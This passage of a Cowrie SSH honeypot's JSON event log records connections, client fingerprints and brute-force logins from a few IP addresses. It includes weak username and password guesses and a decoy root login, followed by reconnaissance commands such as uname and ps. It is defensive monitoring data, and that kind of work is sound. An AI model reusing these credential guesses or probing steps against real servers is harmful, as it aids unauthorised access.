om","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.997991Z","src_ip":"212.227.235.229","session":"624445a1f8f7"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"dell-2022","message":"login attempt [ansible/dell-2022] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:38.560855Z","src_ip":"212.227.235.229","session":"624445a1f8f7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:39.689620Z","src_ip":"212.227.235.229","session":"624445a1f8f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:50:39.948796Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T04:50:39.949567Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50924,"dst_ip":"1.2.3.4","dst_port":22,"session":"a68a46d777ed","protocol":"ssh","message":"New connection: 212.227.235.229:50924 (1.2.3.4:22) [session: a68a46d777ed]","sensor":"my-vps","timestamp":"2025-08-31T04:50:40.685379Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:41.322465Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:41.324142Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:50:42.007113Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:50:42.007873Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:42.323718Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:42.324374Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:43.211890Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.session.closed","duration":"20.9","message":"Connection lost after 20.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:43.213031Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51822,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c54d5ea936","protocol":"ssh","message":"New connection: 212.227.235.229:51822 (1.2.3.4:22) [session: 29c54d5ea936]","sensor":"my-vps","timestamp":"2025-08-31T04:50:46.381740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:46.551946Z","src_ip":"212.227.235.229","session":"29c54d5ea936"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:46.646223Z","src_ip":"212.227.235.229","session":"29c54d5ea936"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"21579cfccf1f","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: 21579cfccf1f]","sensor":"my-vps","timestamp":"2025-08-31T04:50:47.300122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:47.379609Z","src_ip":"212.227.235.229","session":"21579cfccf1f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:47.807077Z","src_ip":"212.227.235.229","session":"21579cfccf1f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwertyuiop","message":"login attempt [admin/qwertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:48.592951Z","src_ip":"212.227.235.229","session":"29c54d5ea936"}
{"eventid":"cowrie.login.failed","username":"anton","password":"anton","message":"login attempt [anton/anton] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:49.166249Z","src_ip":"212.227.235.229","session":"21579cfccf1f"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:49.954765Z","src_ip":"212.227.235.229","session":"29c54d5ea936"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:50.007735Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:51.547159Z","src_ip":"212.227.235.229","session":"21579cfccf1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53202,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f442a419fc8","protocol":"ssh","message":"New connection: 212.227.235.229:53202 (1.2.3.4:22) [session: 2f442a419fc8]","sensor":"my-vps","timestamp":"2025-08-31T04:50:53.683550Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41054,"dst_ip":"1.2.3.4","dst_port":22,"session":"7aeefc08e06e","protocol":"ssh","message":"New connection: 212.227.235.229:41054 (1.2.3.4:22) [session: 7aeefc08e06e]","sensor":"my-vps","timestamp":"2025-08-31T04:50:54.525921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:54.527450Z","src_ip":"212.227.235.229","session":"7aeefc08e06e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:54.802135Z","src_ip":"212.227.235.229","session":"2f442a419fc8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:50:54.802937Z","src_ip":"212.227.235.229","session":"2f442a419fc8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:54.925913Z","src_ip":"212.227.235.229","session":"7aeefc08e06e"}
{"eventid":"cowrie.login.failed","username":"kelly","password":"kelly","message":"login attempt [kelly/kelly] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:56.250315Z","src_ip":"212.227.235.229","session":"7aeefc08e06e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:50:57.602585Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:50:57.603334Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51148,"dst_ip":"1.2.3.4","dst_port":22,"session":"c71f14802096","protocol":"ssh","message":"New connection: 212.227.125.160:51148 (1.2.3.4:22) [session: c71f14802096]","sensor":"my-vps","timestamp":"2025-08-31T04:50:57.605177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:57.605905Z","src_ip":"212.227.125.160","session":"c71f14802096"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:57.794757Z","src_ip":"212.227.125.160","session":"c71f14802096"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48548,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a343e681da5","protocol":"ssh","message":"New connection: 212.227.125.160:48548 (1.2.3.4:22) [session: 5a343e681da5]","sensor":"my-vps","timestamp":"2025-08-31T04:50:58.226985Z"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:58.363376Z","src_ip":"212.227.125.160","session":"c71f14802096"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:58.595076Z","src_ip":"212.227.235.229","session":"7aeefc08e06e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:59.553799Z","src_ip":"212.227.125.160","session":"c71f14802096"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"abc123","message":"login attempt [postgres/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:00.116295Z","src_ip":"212.227.235.229","session":"2f442a419fc8"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:01.786852Z","src_ip":"212.227.235.229","session":"2f442a419fc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53240,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cb5d3cc3d59","protocol":"ssh","message":"New connection: 212.227.235.229:53240 (1.2.3.4:22) [session: 8cb5d3cc3d59]","sensor":"my-vps","timestamp":"2025-08-31T04:51:02.170797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:02.172802Z","src_ip":"212.227.235.229","session":"8cb5d3cc3d59"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diff